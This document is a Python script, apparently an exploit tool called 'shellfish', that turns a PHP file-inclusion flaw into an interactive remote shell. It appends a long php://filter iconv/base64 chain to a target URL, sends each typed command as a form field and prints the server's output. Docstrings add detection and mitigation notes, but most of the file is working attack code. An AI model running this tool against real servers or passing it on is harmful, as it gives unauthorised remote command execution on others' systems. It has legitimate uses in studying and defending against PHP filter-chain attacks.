#!/usr/bin/python3
import requests, argparse, base64, re
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import ANSI
# Module-level prompt_toolkit session, created at import time and used by getshell() to read input.
session = PromptSession()
def clean_output(text, remove_top=0, remove_bottom=0):
    """Reduce an HTML response body to trimmed, printable plain-text lines.

    The text comes from a remote server and is printed to the local
    terminal, so it must be treated as untrusted. Every character outside
    printable ASCII (0x20-0x7E) except newline is deleted, which also drops
    ESC and other control bytes before anything is echoed.

    Args:
        text: Raw response body.
        remove_top: Number of leading lines to discard.
        remove_bottom: Number of trailing lines to discard (0 keeps them all).

    Returns:
        The remaining non-blank lines, each stripped, joined with newlines.
    """
    block_flags = re.DOTALL | re.IGNORECASE
    # Order matters: whole <style>/<head> elements go first, then bare tags,
    # then non-printable characters.
    passes = (
        (r"<style.*?>.*?</style>", block_flags),
        (r"<head.*?>.*?</head>", block_flags),
        (r"<[^>]+>", 0),
        (r"[^\x20-\x7E\n]+", 0),
    )
    stripped = text
    for pattern, flags in passes:
        stripped = re.sub(pattern, "", stripped, flags=flags)

    rows = stripped.strip().splitlines()
    # A stop of -0 would empty the slice, so "no bottom trim" becomes an open end.
    stop = -remove_bottom if remove_bottom != 0 else None
    rows = rows[remove_top:stop]

    trimmed = (row.strip() for row in rows)
    return "\n".join(row for row in trimmed if row)
def getshell(url):
    """Prompt for lines in a loop and POST each one to ``url`` plus a fixed suffix.

    Each non-empty line is sent as form field "0" to ``url`` with a long
    ``php://filter`` chain appended. The response body is passed through
    clean_output() and printed. Only KeyboardInterrupt ends the loop.

    Reads the module-level ``session`` and ``args`` (``args.trim_top`` and
    ``args.trim_bottom``), so it only works after the script's argument
    parsing has run.

    Defender notes:
        * Detection: the request URL carries ``php://filter/`` followed by
          dozens of ``convert.iconv.*`` / ``convert.base64-*`` stages and
          ends in ``resource=php://temp``; the body is a form POST with a
          single field named "0".
        * Mitigation: never let request-controlled values reach
          include/require or other stream-wrapper-aware file APIs; map
          user input to an allow-list of fixed paths instead.

    Args:
        url: Base URL the filter chain is appended to. Presumably it ends in
            the vulnerable file/include parameter; confirm against usage.
    """
    # Constant filter chain, so it is built once instead of on every iteration.
    # NOTE(review): this looks like the publicly documented PHP filter-chain
    # technique (iconv/base64 stages that synthesise content from an empty
    # php://temp stream). What it decodes to cannot be verified from this file.
    filter_chain = (
        "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|"
        "convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|"
        "convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|"
        "convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|"
        "convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|"
        "convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|"
        "convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|"
        "convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|"
        "convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|"
        "convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|"
        "convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|"
        "convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|"
        "convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|"
        "convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|"
        "convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|"
        "convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|"
        "convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|"
        "convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|"
        "convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|"
        "convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|"
        "convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|"
        "convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|"
        "convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|"
        "convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|"
        "convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|"
        "convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|"
        "convert.iconv.UTF8.UTF7|convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT|"
        "convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|"
        "convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|"
        "convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|"
        "convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|"
        "convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|"
        "convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|"
        "convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|"
        "convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|"
        "convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|"
        "convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|"
        "convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|"
        "convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|"
        "convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|"
        "convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|"
        "convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|"
        "convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|"
        "convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|"
        "convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp"
    )
    target = f"{url}{filter_chain}"

    while True:
        try:
            command = session.prompt(ANSI("\033[33m[shellfish]➔ \033[0m"))
            if not command:
                continue
            # The entered line travels as form field "0"; the 10 s timeout keeps
            # an unresponsive server from hanging the prompt.
            response = requests.post(target, data={"0": command}, timeout=10)
            # The response is untrusted: clean_output() strips markup and
            # non-printable bytes before it reaches the terminal.
            visible = clean_output(
                response.text,
                remove_top=args.trim_top,
                remove_bottom=args.trim_bottom,
            )
            print(visible)
        except KeyboardInterrupt:
            break
        except Exception as e:
            # NOTE(review): an EOFError from the prompt (Ctrl-D) also lands here,
            # so it is printed and the loop continues; only Ctrl-C exits.
            print(f"Error: {e}")
if __name__ == "__main__":
    # getshell() reads the module-level name `args` for the trim settings,
    # so the parsed namespace must keep that exact name.
    cli = argparse.ArgumentParser()
    cli.add_argument("-u", "--url", required=True, help="Target URL")
    cli.add_argument("--trim-top", type=int, default=0, help="Removes lines from top.")
    cli.add_argument("--trim-bottom", type=int, default=0, help="Removes lines from bottom.")
    args = cli.parse_args()
    getshell(args.url)